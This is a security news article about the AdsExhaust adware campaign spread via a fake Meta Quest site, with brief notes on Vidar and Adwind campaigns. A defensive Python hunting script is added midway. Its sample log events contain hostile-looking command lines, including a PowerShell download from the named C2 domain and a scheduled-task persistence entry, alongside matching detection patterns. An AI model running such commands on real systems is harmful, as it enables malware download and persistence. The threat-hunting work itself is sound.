
New Adware Campaign Targets Meta Quest App Seekers

By Viral Trending Content

Jun 22, 2024NewsroomPhishing Attack / Adware

A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.

“The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes,” cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.

“These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators.”

The initial infection chain involves surfacing the bogus website (“oculus-app[.]com”) on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive (“oculus-app.EXE.zip”) containing a Windows batch script.

The batch script is designed to fetch a second batch script from a command-and-control (C2) server, which, in turn, contains a command to retrieve another batch file. It also creates scheduled tasks on the machine to run the batch scripts at different times.


This step is followed by the download of the legitimate app onto the compromised host. At the same time, additional Visual Basic Script (VBS) files and PowerShell scripts are dropped to gather IP and system information, capture screenshots, and exfiltrate the data to a remote server (“us11[.]org/in.php”).

The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft’s Edge browser is running and determines the last time a user input occurred.

“If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script,” eSentire said. “It then randomly scrolls up and down the opened page.”

It’s suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.

The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities from the victim, and searching for the word “Sponsored” in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.

Furthermore, it’s equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.

“AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue,” the Canadian company noted.

“It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities.”
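For defenders, the chain described above (a batch script run from a download, scheduled tasks that run batch files, contact with the two domains named in the article, and Edge launched by PowerShell) can be hunted in process-creation logs. The following is an added example, not code from eSentire or the original article; the event field names, stage labels, two-stage threshold and all sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Domains quoted (defanged) in the article, refanged for matching.
IOC_DOMAINS = ("oculus-app.com", "us11.org")

def stages(event):
    """Return the infection-chain stages from the article that one event matches."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"].lower().replace("[.]", ".")
    hits = set()
    # Batch script launched straight out of a download or temp directory.
    if image == "cmd.exe" and re.search(r"\\(downloads|temp)\\.*\.(bat|cmd)\b", cmd):
        hits.add("batch_from_download")
    # Scheduled task whose action (/tr) is a batch file.
    if image == "schtasks.exe" and "/create" in cmd and re.search(r'/tr\s+"?[^"]*\.(bat|cmd)\b', cmd):
        hits.add("task_runs_batch")
    if any(domain in cmd for domain in IOC_DOMAINS):
        hits.add("article_ioc_domain")
    # Edge started by PowerShell rather than by the user's shell.
    if image == "msedge.exe" and parent in ("powershell.exe", "pwsh.exe"):
        hits.add("edge_from_powershell")
    return hits

def triage(events, min_stages=2):
    """Group hits per host; report hosts showing at least min_stages distinct stages."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]] |= stages(event)
    return {host: sorted(found) for host, found in per_host.items() if len(found) >= min_stages}

# Constructed process-creation events (hosts, paths and file names are invented).
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\cmd.exe", "parent": "explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\a\Downloads\oculus-app.EXE\setup.bat"'},
    {"host": "WS-01", "image": r"C:\Windows\System32\schtasks.exe", "parent": "cmd.exe",
     "cmdline": r'schtasks /create /sc minute /mo 30 /tn "Updater" /tr "C:\Users\a\AppData\Local\Temp\u.bat"'},
    {"host": "WS-01", "image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell.exe -c iwr hxxp://us11[.]org/in.php"},
    {"host": "WS-01", "image": "msedge.exe", "parent": "powershell.exe", "cmdline": "msedge.exe"},
    {"host": "WS-02", "image": "schtasks.exe", "parent": "msiexec.exe",
     "cmdline": r'schtasks /create /tn "AppUpdate" /tr "C:\Program Files\App\updater.exe"'},
    {"host": "WS-02", "image": "msedge.exe", "parent": "explorer.exe", "cmdline": "msedge.exe"},
    {"host": "WS-03", "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": r"cmd.exe /c C:\Users\b\Downloads\build.bat"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Requiring two distinct stages keeps a single batch file run from Downloads (WS-03) or an ordinary installer task (WS-02) from raising an alert on its own.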

The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.

What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).

“This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online,” eSentire said.


The disclosure also comes on the heels of a malspam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).

“Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files,” Broadcom-owned Symantec said.

“The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration.”
